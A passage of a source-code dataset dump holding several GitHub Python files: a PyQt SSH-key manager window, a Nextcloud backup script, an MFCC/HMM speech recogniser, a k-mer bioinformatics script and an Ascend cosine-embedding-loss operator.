uic\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5.QtGui import QIcon\nimport sys\n\nfrom PyQt5.QtWidgets import QTableWidgetItem\n\nfrom cloud_management import get_user_ssh, delete_ssh\n\nsshlist = {'Name': 'name', 'Public Key': 'public_key', 'Cloud': 'cloud_name', 'id': 'id', 'Cloud id': 'cloud_id'}\n\n\nclass ShowSSHUi(QtWidgets.QMainWindow):\n def __init__(self, user_id: int = None):\n super(ShowSSHUi, self).__init__() # Call the inherited classes __init__ method\n uic.loadUi('show_ssh.ui', self) # Load the .ui file\n self.user_id = user_id\n self.back = self.findChild(QtWidgets.QPushButton, 'bt_back')\n self.back.clicked.connect(self.backButtonPressed)\n\n self.edit = self.findChild(QtWidgets.QPushButton, 'edit')\n self.edit.clicked.connect(self.update_buttonPressed)\n\n self.create = self.findChild(QtWidgets.QPushButton, 'create')\n self.create.clicked.connect(self.createButtonPressed)\n\n self.delete = self.findChild(QtWidgets.QPushButton, 'delete_2')\n self.delete.clicked.connect(self.deleteButtonPressed)\n # todo maryam action titlesh pak nashode\n self.ssh_list = self.findChild(QtWidgets.QTableWidget, 'tableWidget')\n self.ssh_list.setColumnHidden(3, True) # column 3 is cloud id\n self.ssh_list.setColumnHidden(4, True) # column 4 is id\n self.create_table()\n\n def create_table(self):\n sshs = get_user_ssh(user_id=self.user_id)\n self.ssh_list.setRowCount(len(sshs))\n count = 0\n for ssh in sshs:\n for key, value in ssh.items():\n headercount = self.ssh_list.columnCount()\n m = key\n for x in range(0, headercount, 1):\n headertext = self.ssh_list.horizontalHeaderItem(x).text()\n if m == sshlist[headertext]:\n self.tableWidget.setItem(count, x, QTableWidgetItem(str(value)))\n count += 1\n\n def update_buttonPressed(self):\n row = self.ssh_list.currentItem().row()\n from ui.ssh_make import MakeSSHUi\n self.OtherWindow = MakeSSHUi(user_id=self.user_id,ssh_id=int(self.ssh_list.item(row, 4).text()))\n self.OtherWindow.show()\n self.close()\n\n def createButtonPressed(self):\n from ui.ssh_make import MakeSSHUi\n self.OtherWindow = MakeSSHUi(user_id=self.user_id)\n self.OtherWindow.show()\n self.close()\n\n def deleteButtonPressed(self):\n row = self.ssh_list.currentItem().row()\n delete_ssh(int(self.ssh_list.item(row, 4).text()))\n self.create_table()\n\n # todo if press back button back to dashboard\n def backButtonPressed(self):\n # if id=admin ->show all SSHs\n # from admin_dashboard import AdminDashboardUi\n # self.OtherWindow = AdminDashboardUi()\n # self.OtherWindow.show()\n # self.close()\n\n # if id=customer -> show just SSHs of customer\n from ui.dashboard import DashboardUi\n self.OtherWindow = DashboardUi(user_id=self.user_id)\n self.OtherWindow.show()\n self.close()\n\n\n def get_value(object):\n if isinstance(object, QtWidgets.QComboBox):\n value = object.itemData(object.currentIndex())\n if isinstance(object, QtWidgets.QTextEdit):\n value = object.toPlainText()\n if isinstance(object, QtWidgets.QTextBrowser):\n value = object.toPlainText()\n if isinstance(object, QtWidgets.QLabel):\n value = object.text()\n if isinstance(object, QtWidgets.QSpinBox):\n value = object.value()\n if isinstance(object, QtWidgets.QDoubleSpinBox):\n value = object.value()\n return value\n\n\ndef main():\n app = QtWidgets.QApplication(sys.argv) # Create an instance of QtWidgets.QApplication\n window = ShowSSHUi(19) # Create an instance of our class\n window.show()\n sys.exit(app.exec_()) # Start the application\n\n\nif __name__ == \"__main__\":\n main()\n# todo maryam oon id ro hide kon actiono 
bardar\n# todo maryam safeyehaye manage ro pak kon kolan\n","repo_name":"vidagharavian/cloud_service","sub_path":"ui/show_ssh.py","file_name":"show_ssh.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33433532497","text":"from deployments import BasicRsyncBackup, client\nfrom deployments import user_config\nfrom os.path import dirname, abspath, join\nfrom datetime import datetime\nfrom sys import argv\n\n\nclass BackupNextcloud(BasicRsyncBackup):\n \"\"\"Backup the database and files for the nextcloud service.\"\"\"\n\n backup_dir = \"/backup/nextcloud\"\n source_dir = join(dirname(abspath(__file__)), \"mounts\", \"webroot\")\n\n def __init__(self, *args, **kwargs):\n \"\"\"Initialize variables that are dynamic.\"\"\"\n super().__init__(*args, **kwargs)\n self.now = int(datetime.now().strftime(r\"%s\"))\n self.stage = join(self.backup_dir, \"staging\", str(self.now))\n self.container = client.containers.list(\n filters={'name': 'nextcloud_database_1'}\n )[0] # throws an exception if the container isn't running.\n\n def do_backup(self, *args, **kwargs):\n \"\"\"Override to add extra steps.\"\"\"\n self.prep_folder(self.backup_dir)\n self.prep_folder(self.stage)\n self.backup_database()\n super().do_backup(*args, **kwargs)\n\n def backup_database(self):\n \"\"\"Get a dump from the database and store it in the staging area.\"\"\"\n dump_result = self.container.exec_run(\n \"mysqldump -u nextcloud --password='%s' nextcloud\"\n % user_config['database']\n )\n if dump_result.exit_code:\n raise ValueError(\n \"The mysqldump command returned %d. The command output:\\n%s\"\n % (int(dump_result.exit_code), dump_result.output)\n )\n with open(join(self.stage, \"database.dump\"), 'w') as dumpfile:\n dumpfile.write(dump_result.output.decode())\n\n\ndef main():\n \"\"\"The main entrypoint of the backup script if it's run alone.\"\"\"\n if \"--no-cronjob\" in argv:\n # setup cron job\n freq = False\n else:\n if '--freq=hourly' in argv:\n freq = 'hourly'\n if '--freq=weekly' in argv:\n freq = 'weekly'\n if '--freq=monthly' in argv:\n freq = 'monthly'\n else:\n freq = 'daily'\n backup = BackupNextcloud(freq, abspath(__file__))\n backup.do_backup()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"dscottboggs/Deployments","sub_path":"deployments/nextcloud/backup.py","file_name":"backup.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71471417768","text":"import numpy as np\r\nfrom scipy.fftpack import dct\r\nimport scipy.io.wavfile\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport hashlib\r\nimport re\r\nfrom hmmlearn import hmm\r\nimport pickle\r\nimport math\r\nfrom sklearn.metrics import confusion_matrix\r\nfrom sklearn.metrics import ConfusionMatrixDisplay\r\nfrom sklearn.metrics import precision_recall_fscore_support\r\nfrom prettytable import PrettyTable\r\nfrom prettytable import PLAIN_COLUMNS\r\ndef get_features(file_path, pre_emphasis = 0.95, frame_size = 0.025, frame_step = 0.01, NFFT = 512,\\\r\n nfilt = 26, low_freq_hz = 300, num_ceps = 13): \r\n \"\"\"\r\n Args:\r\n file_path: File path of the data sample.\r\n pre_emphasis: filter coefficient for pre emphasis phase.\r\n frame_size: size of the frames in framing phase.\r\n frame_step: size of the overlap in framing phase.\r\n NFFT: point numbers of discrete Fourier Transform (DFT).\r\n nfilt: number of filters used in 
filter Banks calulation phase.\r\n low_freq_hz: lower frequency used in filter Banks calulation phase.\r\n num_ceps: number of Cepstral Coefficients. \r\n\r\n Returns:\r\n numpy array, of features: MFFCCs and delta coefficients.\r\n \"\"\"\r\n sample_rate, signal = scipy.io.wavfile.read(file_path)\r\n #sample_rate = 16000 \r\n \r\n #Preemphasis\r\n signal = np.append(signal[0], signal[1:] - pre_emphasis * signal[: -1])\r\n #plotSignal(time, signal)\r\n\r\n #Framing\r\n signal_length = len(signal)\r\n frame_length = int(frame_size * sample_rate)\r\n step_length = int(frame_step * sample_rate)\r\n\r\n\r\n num_frames = int(np.ceil(float(np.abs(signal_length-frame_length))/step_length))+1\r\n \r\n pad_signal_length = (frame_length + num_frames * step_length) - signal_length\r\n pad_signal = np.zeros(pad_signal_length)\r\n signal = np.append(signal,pad_signal)\r\n\r\n indices_matrix = np.tile(np.arange(0,frame_length),(num_frames,1))\r\n offset_indices = np.arange(0,step_length*num_frames,step_length)\r\n indices_matrix = (indices_matrix[0:].T + (offset_indices[0:])).T\r\n frames = signal[indices_matrix.astype(np.int32, copy=False)]\r\n\r\n #Windowing\r\n #Explicit implementation:\r\n #w = np.arange(0,frame_length)\r\n #w = 0.54 - 0.46 * np.cos((2 * np.pi * w) / (frame_length - 1))\r\n #frames*=w\r\n \r\n frames *= np.hamming(frame_length)\r\n \r\n \r\n #Discrete Fourier Transformation\r\n magnitude_frames = np.absolute(np.fft.rfft(frames, NFFT))\r\n \r\n #Power spectrum\r\n pow_frames = (magnitude_frames ** 2) / NFFT\r\n \r\n #Compute energy\r\n energy = np.sum(pow_frames, axis = 1)\r\n\r\n #Filter Banks\r\n # nfilt = filters number\r\n # low_freq_hz = 300 usually default is 0 (set to 300 for discard too low frequency,\\\r\n # likely generated from noise)\r\n highfreq = sample_rate / 2\r\n low_freq_mel = (2595 * np.log10(1 + low_freq_hz / 700.)) # Convert Hz to Mel\r\n high_freq_mel = (2595 * np.log10(1 + highfreq / 700.)) # Convert Hz to Mel\r\n\r\n mel_points = np.linspace(low_freq_mel, high_freq_mel, nfilt + 2 ) # Equally spaced in Mel scale\r\n hz_points = (700 * (10** (mel_points / 2595.0) - 1 )) # Convert Mel to Hz\r\n \r\n #hz_points 28 gia tri : 300 -> 8000\r\n bin = np.floor((NFFT + 1) * hz_points / sample_rate) # our points are in Hz, but we use fft bins,\\\r\n # so we have to conver from Hz to fft bin number\r\n # print(bin)\r\n # [ 9. 12. 15. 18. 21. 25. 29. 33. 38. 43. 49. 54. 61. 68.\r\n #75. 84. 93. 102. 113. 124. 136. 150. 164. 180. 196. 215. 235. 
256.]\r\n fbank = np.zeros((nfilt, int(np.floor(NFFT / 2 + 1))))\r\n #fbank.size=6682\r\n \r\n for j in range(0,nfilt):\r\n for i in range(int(bin[j]), int(bin[j+1])):\r\n fbank[j,i] = (i - bin[j]) / (bin[j+1]-bin[j])\r\n for i in range(int(bin[j+1]), int(bin[j+2])):\r\n fbank[j,i] = (bin[j+2]-i) / (bin[j+2]-bin[j+1])\r\n \r\n # Plot filterbank if you want \r\n #plotFilterbank(fbank) \r\n # print(pow_frames[0].size)\r\n filter_banks = np.dot(pow_frames, fbank.T)\r\n \r\n filter_banks = np.where(filter_banks == 0, np.finfo(float).eps, filter_banks) # if energy is zero, we get problems with log\r\n \r\n filter_banks = np.log10(filter_banks) # dB\r\n \r\n #Mel Frequency Cepstral Coefficients\r\n mfcc = dct(filter_banks, type=2, axis=1, norm='ortho')[:, 0:(num_ceps)] # Keep 0 to num_ceps-1\r\n \r\n mfcc[:, 0] = np.log(energy + 1e-8) # the zeroth cepstral coefficient is replaced with the log of\\\r\n # the total frame energy\r\n\r\n\r\n cep_lifter = 22\r\n (nframes, ncoeff) = mfcc.shape\r\n n = np.arange(ncoeff)\r\n lift = 1 + (cep_lifter / 2) * np.sin(np.pi * n / cep_lifter)\r\n mfcc *= lift \r\n\r\n #Mean normalization \r\n filter_banks -= (np.mean(filter_banks, axis=0) + 1e-8)\r\n mfcc -= (np.mean(mfcc, axis=0) + 1e-8)\r\n\r\n #Delta compute\r\n N = 2\r\n num_frames = mfcc.shape[0]\r\n \r\n denominator = 2 * sum([n**2 for n in range(1, N+1)])\r\n \r\n delta_feat = np.empty_like(mfcc)\r\n delta_feat2 = np.empty_like(mfcc)\r\n padded = np.pad(mfcc, ((N, N), (0, 0)), mode='edge') # padded version of feature vectors(mfcc) (appending N*2 rows)\r\n # print(mfcc[1])\r\n # print(padded[1])\r\n for t in range(num_frames):\r\n delta_feat[t] = np.dot(np.arange(-N, N+1), padded[t : t+2*N+1]) / denominator # [t : t+2*N+1] == [(N+t)-N : (N+t)+N+1]\r\n # print(np.arange(-N, N+1)[0 : 5])\r\n #Append mfcc and Delta features\r\n features = np.append(mfcc, delta_feat, axis = 1)\r\n padded = np.pad(delta_feat, ((N, N), (0, 0)), mode='edge')\r\n for t in range(num_frames):\r\n delta_feat2[t] = np.dot(np.arange(-N, N+1), padded[t : t+2*N+1]) / denominator\r\n features = np.append(features, delta_feat2, axis = 1) \r\n # print(features.size)\r\n return features\r\ndef main() :\r\n train_dict_word = {}\r\n test_dict_word = {}\r\n labels_list = []\r\n features_list = []\r\n path_dataset = \"Dataset/features/data_train\"\r\n for root_dir, sub_dir, file in os.walk(path_dataset):\r\n sub_dir[:] = [d for d in sub_dir ]\r\n for txt in file:\r\n if(re.match('.*\\.txt$',txt)):\r\n file_path = (os.path.join(root_dir, txt))\r\n label = os.path.relpath(root_dir, path_dataset)\r\n feature = np.loadtxt(\"Dataset/features/data_train/\"+label+\"/\"+txt,delimiter=', ')\r\n labels_list.append(label)\r\n features_list.append(feature)\r\n \r\n words = np.unique(labels_list)\r\n \"\"\"\r\n Split 85% for training and 15% for test\r\n \"\"\"\r\n training_features = features_list\r\n training_labels = labels_list\r\n labels_list = []\r\n features_list = []\r\n path_dataset = \"Dataset/data/data_set\"\r\n for root_dir, sub_dir, file in os.walk(path_dataset):\r\n sub_dir[:] = [d for d in sub_dir ]\r\n for wave in file:\r\n \r\n if(re.match('.*\\.wav$',wave)):\r\n file_path = (os.path.join(root_dir, wave))\r\n label = os.path.relpath(root_dir, path_dataset)\r\n feature = get_features(file_path)\r\n labels_list.append(label)\r\n features_list.append(feature) \r\n test_features = features_list\r\n test_labels = labels_list \r\n for i in range(len(training_features)):\r\n if training_labels[i] not in train_dict_word:\r\n 
train_dict_word[training_labels[i]] = []\r\n train_dict_word[training_labels[i]].append(training_features[i])\r\n else:\r\n train_dict_word[training_labels[i]].append(training_features[i]) \r\n for i in range(len(test_features)):\r\n if test_labels[i] not in test_dict_word:\r\n test_dict_word[test_labels[i]] = []\r\n test_dict_word[test_labels[i]].append(test_features[i])\r\n else:\r\n test_dict_word[test_labels[i]].append(test_features[i])\r\n #Train dataset\r\n\r\n GMMHMM_models_word = {} # dict of HMMs (one model for each word into the dataset)\r\n num_states = 3 # States number of HMM\r\n num_mix = 2 # number of mixtures for each hidden state\r\n covariance_type = 'diag' # covariance type\r\n num_iter = 10 # number of max iterations\r\n bakis_level = 2\r\n\r\n start_prob = np.zeros(num_states) # start probability prior\r\n start_prob[0:bakis_level - 1] = 1 / float(1 / (bakis_level - 1))\r\n\r\n trans_mat = np.eye(num_states) # transaction matrix probability prior \r\n for i in range(num_states - (bakis_level - 1)):\r\n for j in range(bakis_level):\r\n trans_mat[i, i + j] = 1 / bakis_level\r\n\r\n for i in range((num_states - (bakis_level ) + 1), num_states ):\r\n trans_mat[i,i:] = (1 / (num_states - i))\r\n\r\n\r\n model_number = 0\r\n for word in train_dict_word:\r\n model = hmm.GMMHMM(n_components = num_states, n_mix = num_mix, startprob_prior = start_prob,\\\r\n transmat_prior = trans_mat, covariance_type = covariance_type,\\\r\n n_iter = num_iter, verbose=False)\r\n\r\n train_samples = train_dict_word[word]\r\n length_samples = np.zeros(len(train_samples), dtype=np.int) \r\n for elem in range(len(train_samples)):\r\n length_samples[elem] = train_samples[elem].shape[0]\r\n \r\n train_samples = np.vstack(train_samples) # Stack arrays in train_samples in sequence vertically \r\n\r\n \r\n \r\n \r\n \r\n #model.fit(train_samples, length_samples) # MODEL FIT\r\n model.fit(train_samples)\r\n \r\n GMMHMM_models_word[word] = model\r\n print(\"Finish train model GMM-HMM %s\" % model_number)\r\n model_number += 1\r\n num_words = len(train_dict_word)\r\n print(\"Finish train %s GMM-HMMs for %s different words\" % (num_words, num_words))\r\n\r\n\r\n trained_model_word = GMMHMM_models_word\r\n\r\n print(\"\")\r\n\r\n #Test data\r\n\r\n score_count = 0\r\n words_number = 0\r\n y_true = []\r\n y_pred = []\r\n for word in test_dict_word.keys():\r\n test_samples = test_dict_word[word]\r\n for speech_word in test_samples:\r\n words_number += 1\r\n score_models = {}\r\n for word_model in trained_model_word.keys():\r\n model = trained_model_word[word_model]\r\n score = model.score(speech_word)\r\n score_models[word_model] = score\r\n predict_word = max(score_models, key = score_models.get)\r\n print(word, \": \", predict_word)\r\n y_true.append(word)\r\n y_pred.append(predict_word)\r\n if predict_word == word:\r\n score_count += 1\r\n\r\n \r\n accuracy = (100 * score_count / words_number) \r\n print(\"Recognition rate %s\" %(accuracy))\r\n #euclid\r\n score_count = 0\r\n words_number = 0\r\n y_true = []\r\n y_pred = []\r\n for word in test_dict_word.keys():\r\n test_samples = test_dict_word[word]\r\n for test_word in test_samples:\r\n words_number += 1\r\n score_models = {}\r\n for train_model in train_dict_word.keys():\r\n feature_train = train_dict_word[train_model]\r\n #print(feature_train[0][0][0])\r\n dem = 0\r\n score = 0;\r\n for sample in feature_train :\r\n total = 0\r\n for i in range(len(sample)):\r\n euclid = 0\r\n for j in range(39):\r\n euclid= euclid + 
(test_word[i][j]-sample[i][j])**2\r\n euclid = math.sqrt(euclid)\r\n total = total + euclid\r\n score = score+total \r\n \r\n # print(score)\r\n #10/99/24\r\n score_models[train_model] = score\r\n predict_word = min(score_models, key = score_models.get)\r\n print(word, \": \", predict_word)\r\n y_true.append(word)\r\n y_pred.append(predict_word)\r\n if predict_word == word:\r\n score_count += 1\r\n\r\n \r\n accuracy = (100 * score_count / words_number) \r\n print(\"Recognition rate %s\" %(accuracy))\r\n \r\n\r\nmain()","repo_name":"xuanthuan0502/recognize_speech","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":12365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14194367428","text":"\n\nfrom collections import defaultdict\nfrom itertools import combinations, product\n\n\ndef reverse_complement_dna(dna):\n\t'''Returns the reverse complement of the given DNA strand.'''\n\tintab = \"ATCG\"\n\touttab = \"TAGC\"\n\ttrantab = dna.maketrans(intab,outtab)\n\treverse_complement = dna.translate(trantab)\n\treturn reverse_complement[::-1]\n\n\ndef ImmediateNeighbors(Pattern):\n\tNeighborhood = list()\n\tNeighborhood.append(Pattern)\n\tnucleotides = [\"A\",\"C\",\"G\",\"T\"]\n\tfor i in range(0,len(Pattern)):\n\t\tsymbol = Pattern[i]\n\t\tfor nucleotide in nucleotides:\n\t\t\tif symbol != nucleotide:\n\t\t\t\tNeighbor = Pattern[:i] + nucleotide + Pattern[(i+1):]\n\t\t\t\tNeighborhood.append(Neighbor)\n\tprint(Neighborhood)\n\treturn Neighborhood\n\n\ndef IterativeNeighbors(Pattern, d):\n\tNeighborhood = list()\n\tNeighborhood.append(Pattern)\n\tfor j in range(0,d):\n\t\tfor String in Neighborhood:\n\t\t\tNeighborhood = Neighborhood + ImmediateNeighbors(Pattern)\n\tprint(Neighborhood)\n\treturn Neighborhood\n\n\ndef kmer_mismatches(kmer, d):\n \"\"\"Returns all k-mers that are within d mismatches of the given k-mer.\"\"\"\n mismatches = [kmer] # Initialize mismatches with the k-mer itself (i.e. 
d=0).\n alt_bases = {'A':'CGT', 'C':'AGT', 'G':'ACT', 'T':'ACG'}\n for dist in range(1, d+1):\n for change_indices in combinations(range(0,len(kmer)), dist):\n for substitutions in product(*[alt_bases[kmer[i]] for i in change_indices]):\n new_mistmatch = list(kmer)\n for idx, sub in zip(change_indices, substitutions):\n new_mistmatch[idx] = sub\n mismatches.append(''.join(new_mistmatch))\n return mismatches\n\ndef FrequentWords_with_mm_and_rc(string,k,d):\n\t\"\"\"Returns all most frequent k-mers with up to d mismatches in the dna sequence seq.\"\"\"\n\t# Frequency analysis so we don't generate mismatches for the same k-mer more than once.\n\tfreqMap = defaultdict(int)\n\tfor i in range(0,((len(string)-k)+1)):\n\t\tfreqMap[string[i:i+k]] += 1\n\t\tfreqMap[reverse_complement_dna(string[i:k+i])] += 1\n\n\tmismatch_count = defaultdict(int)\n\tfor pattern, freq in freqMap.items():\n\t\tfor mismatch in IterativeNeighbors(pattern,d):\n\t\t\tmismatch_count[mismatch] += freq\n\n\tm = max(mismatch_count.values())\n\tfrequent_patterns = sorted([pattern for pattern, count in mismatch_count.items() if count == m])\n\treturn frequent_patterns\n\n\nwith open(\"input_3.txt\") as file:\n\tdata = file.readlines()\n\tstring = data[0].strip()\n\tnumbers = data[1].strip().split(\" \")\n\n\nprint(numbers)\nprint(string)\n\nPatterns = FrequentWords_with_mm_and_rc(string,int(numbers[0]),int(numbers[1]))\nprint(*Patterns,sep=\" \")","repo_name":"neuwirtt/Bioinformatics_I","sub_path":"FrequentWordsMismatchesReverseComplement.py","file_name":"FrequentWordsMismatchesReverseComplement.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8643401786","text":"from functools import reduce\nimport te.lang.cce\nfrom te import tvm\nfrom te.platform.fusion_manager import fusion_manager\nfrom topi import generic\nfrom topi.cce import util\nfrom te import platform as cceconf\n\n\n# pylint: disable=locally-disabled,too-many-arguments,too-many-locals\ndef _shape_check(shape_x1, shape_x2, shape_tgt):\n # check whether the shape meets the broadcast requirements, and output broadcast shape\n try:\n _, _, x_shape = util.produce_shapes(shape_x1, shape_x2)\n except RuntimeError:\n raise RuntimeError(\"x1 and x2 can't be broadcast\")\n\n x_shape_reduce = x_shape[:]\n x_shape_reduce.pop(1)\n try:\n _, _, tgt_shape = util.produce_shapes(x_shape_reduce, shape_tgt)\n except RuntimeError:\n raise RuntimeError(\"x and target can't be broadcast\")\n min_dim = min(len(shape_x1), len(shape_x2), len(shape_tgt))\n if min_dim >= 3:\n reduce_dim = -1\n for i in range(-1, -min_dim, -1):\n if(shape_x1[i] == shape_x2) or (\n shape_x1[i] == shape_tgt[i]):\n reduce_dim = i\n else:\n break\n if reduce_dim != -1:\n shape_x1 = list(shape_x1[:reduce_dim]) + [\n reduce(lambda x, y:x*y, shape_x1[reduce_dim:])]\n shape_x2 = list(shape_x2[:reduce_dim]) + [\n reduce(lambda x, y:x*y, shape_x2[reduce_dim:])]\n shape_tgt = list(shape_tgt[:reduce_dim]) + [\n reduce(lambda x, y:x*y, shape_tgt[reduce_dim:])]\n x_shape = list(x_shape[:reduce_dim]) + [\n reduce(lambda x, y:x*y, x_shape[reduce_dim:])]\n tgt_shape = list(tgt_shape[:reduce_dim]) + [\n reduce(lambda x, y:x*y, tgt_shape[reduce_dim:])]\n util.check_shape_rule(shape_x1)\n util.check_shape_rule(shape_x2)\n util.check_shape_rule(shape_tgt)\n util.check_tensor_shape_size(shape_x1)\n util.check_tensor_shape_size(shape_x2)\n util.check_tensor_shape_size(shape_tgt)\n\n return x_shape, tgt_shape, shape_x1, shape_x2, 
shape_tgt\n\n\ndef _dtype_check(input_dtype_x1, input_dtype_x2, target_dtype, reduction):\n # cast_to not support \"int16\", \"int64\", ISA not support float64(double)\n x_check_list = [\"int8\", \"uint8\", \"int32\", \"float16\", \"float32\"]\n if not input_dtype_x1 in x_check_list:\n raise RuntimeError(\"x1 dtype %s not support\" % input_dtype_x1)\n if not input_dtype_x2 in x_check_list:\n raise RuntimeError(\"x2 dtype %s not support\" % input_dtype_x2)\n\n # cast_to not support \"int16\", \"int64\", \"uint8\" can't indicate -1\n tgt_check_list = [\"int8\", \"int32\", \"float16\", \"float32\"]\n if not target_dtype in tgt_check_list:\n raise RuntimeError(\"target dtype %s not support\" % target_dtype)\n\n reduce_check_list = ['mean', 'sum', 'none']\n if reduction not in reduce_check_list:\n raise RuntimeError(\"reduction method not support\")\n\n\n# pylint: disable=locally-disabled,unused-argument,invalid-name\n@fusion_manager.register(\"cosine_embedding_loss\")\ndef cosine_embedding_loss_compute(x1, x2, target, output_y, x_shape_broadcat,\n tgt_shape_broadcast, margin=0,\n reduction='mean',\n kernel_name=\"cosine_embedding_loss\"):\n \"\"\"\n DSL description of the cosine_embedding_loss operator's calculation process\n\n Parameters\n ----------\n x1: TVM tensor\n the placeholder of x1 input data\n x2: TVM tensor\n the placeholder of x2 input data\n target: TVM tensor\n the placeholder of target input data\n output_y: TVM tensor\n the placeholder of beta output data\n x_shape_broadcat: list,\n x1 and x2 broadcast shape\n tgt_shape_broadcast: list\n x and target broadcast shape\n margin: float\n margin, default value is \"0.0\"\n reduction: str\n string indicate reduce method, default value is \"mean\"\n kernel_name: str\n cce kernel name, default value is \"group_norm\"\n\n Returns\n -------\n res: TVM tensor\n \"\"\"\n cce_plat = cceconf.get_soc_spec('SOC_VERSION')\n cast_dtype = 'float32'\n epsilon = tvm.const(1e-12, dtype=\"float32\")\n\n if cce_plat == 'Ascend310':\n cast_dtype = 'float16'\n epsilon = tvm.const(5e-8, dtype=\"float16\")\n\n if x1.dtype.lower() != cast_dtype and x1.dtype.lower() != 'float32':\n x1 = te.lang.cce.cast_to(x1, cast_dtype)\n\n if x2.dtype.lower() != cast_dtype and x2.dtype.lower() != 'float32':\n x2 = te.lang.cce.cast_to(x2, cast_dtype)\n\n target = te.lang.cce.cast_to(target, x1.dtype)\n\n x1_broadcast = te.lang.cce.broadcast(x1, x_shape_broadcat)\n x2_broadcast = te.lang.cce.broadcast(x2, x_shape_broadcat)\n target_broadcast = te.lang.cce.broadcast(target, tgt_shape_broadcast)\n\n # DSL description for cosine similarity compute\n prod = te.lang.cce.vmul(x1_broadcast, x2_broadcast)\n\n mag1 = te.lang.cce.vmul(x1_broadcast, x1_broadcast)\n mag2 = te.lang.cce.vmul(x2_broadcast, x2_broadcast)\n mag_square1 = te.lang.cce.sum(mag1, axis=1)\n mag_square2 = te.lang.cce.sum(mag2, axis=1)\n\n x1_epsilon = te.lang.cce.vadds(mag_square1, epsilon)\n x2_epsilon = te.lang.cce.vadds(mag_square2, epsilon)\n x1_sqrt = te.lang.cce.vsqrt(x1_epsilon)\n x2_sqrt = te.lang.cce.vsqrt(x2_epsilon)\n mode_num = te.lang.cce.vmul(x1_sqrt, x2_sqrt)\n prod_num = te.lang.cce.sum(prod, axis=1)\n cos_res = te.lang.cce.vdiv(prod_num, mode_num)\n\n # DSL description for 1 - cos(x1, x2)\n zero_tensor = te.lang.cce.vmuls(target_broadcast, 0)\n one_tensor = te.lang.cce.vadds(zero_tensor, 1)\n\n neg_one_tensor = te.lang.cce.vsub(zero_tensor, one_tensor)\n pos = te.lang.cce.vsub(one_tensor, cos_res)\n\n # DSL description for max(0, cos(x1, x2) - margin)\n margin_const = tvm.const(margin, 
dtype=\"float32\")\n margin_tensor = te.lang.cce.vmuls(one_tensor, margin_const)\n neg_sub = te.lang.cce.vsub(cos_res, margin_tensor)\n neg = te.lang.cce.vmax(zero_tensor, neg_sub)\n\n # DSL description for output = pos if y == 1 else neg\n output_pos = te.lang.cce.vcmpsel(target_broadcast, one_tensor, 'eq',\n pos, zero_tensor)\n output_neg = te.lang.cce.vcmpsel(target_broadcast, neg_one_tensor, 'eq',\n neg, zero_tensor)\n res = te.lang.cce.vadd(output_pos, output_neg)\n if reduction in ['sum', 'mean']:\n if reduction == 'mean':\n num = reduce(lambda x, y: x * y, tgt_shape_broadcast)\n mean_cof = num ** (-1)\n res = te.lang.cce.vmuls(res, mean_cof)\n res = te.lang.cce.cast_to(res, 'float32')\n\n reduce_axis = [index for index, _ in enumerate(tgt_shape_broadcast)]\n res_sum = te.lang.cce.sum(res, axis=reduce_axis)\n return res_sum\n\n return te.lang.cce.cast_to(res, 'float32')\n\n\n# pylint: disable=locally-disabled,too-many-arguments,too-many-locals\n@util.check_input_type(dict, dict, dict, dict, float, str, str)\ndef cosine_embedding_loss(input_x1, input_x2, target, y,\n margin=0, reduction='mean',\n kernel_name=\"cosine_embedding_loss\"):\n \"\"\"\n algorithm: cosine_embedding_loss\n cosine embedding loss = // 1-cos(x1, x2), if y == 1\n \\\\ max(0, cos(x1, x2) - margin), if y == -1\n Note that the size of 5D Tensors are defined by \"NC1HWC0\".\n The input tensor's dimension C should be equal.\n\n Parameters\n ----------\n x1: dict\n dict of input x1, A Tensor for input data.\n x2: dict\n dict of input x1, A Tensor for input data.\n target: dict\n dict of target, A Tensor for target, include 1 and -1.\n output_y: dict\n dict of output, A Tensor for output\n margin: float\n float of margin, A float number subtracted when y == -1\n reduction: str\n str of output reduce method.\n kernel_name: str\n kernel name, default value is \"cosine_embedding_loss\"\n\n Returns\n -------\n None\n \"\"\"\n shape_x1 = input_x1.get(\"shape\")\n dtype_x1 = input_x1.get(\"dtype\")\n input_dtype_x1 = dtype_x1.lower()\n shape_x2 = input_x2.get(\"shape\")\n dtype_x2 = input_x2.get(\"dtype\")\n input_dtype_x2 = dtype_x2.lower()\n shape_tgt = target.get(\"shape\")\n dtype_tgt = target.get(\"dtype\")\n target_dtype = dtype_tgt.lower()\n\n util.check_kernel_name(kernel_name)\n x_shape_broadcat, tgt_shape_broadcast, shape_x1, shape_x2, shape_tgt = \\\n _shape_check(shape_x1, shape_x2, shape_tgt)\n _dtype_check(input_dtype_x1, input_dtype_x2, target_dtype, reduction)\n\n data_input1 = tvm.placeholder(shape_x1, name=\"data_input1\",\n dtype=input_dtype_x1)\n data_input2 = tvm.placeholder(shape_x2, name=\"data_input2\",\n dtype=input_dtype_x2)\n data_target = tvm.placeholder(shape_tgt, name=\"data_target\",\n dtype=target_dtype)\n\n res = cosine_embedding_loss_compute(data_input1, data_input2, data_target,\n y, x_shape_broadcat,\n tgt_shape_broadcast, margin, reduction,\n kernel_name)\n\n with tvm.target.cce():\n schedule = generic.auto_schedule(res)\n\n config = {\n \"name\": kernel_name,\n \"tensor_list\": [data_input1, data_input2, data_target, res],\n }\n\n te.lang.cce.cce_build_code(schedule, config)\n","repo_name":"gekowa/ascend-opp","sub_path":"op_impl/built-in/ai_core/tbe/impl/cosine_embedding_loss.py","file_name":"cosine_embedding_loss.py","file_ext":"py","file_size_in_byte":9486,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16509892528","text":"from mpi4py import MPI\nimport pandas as pd\n\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nsize = 
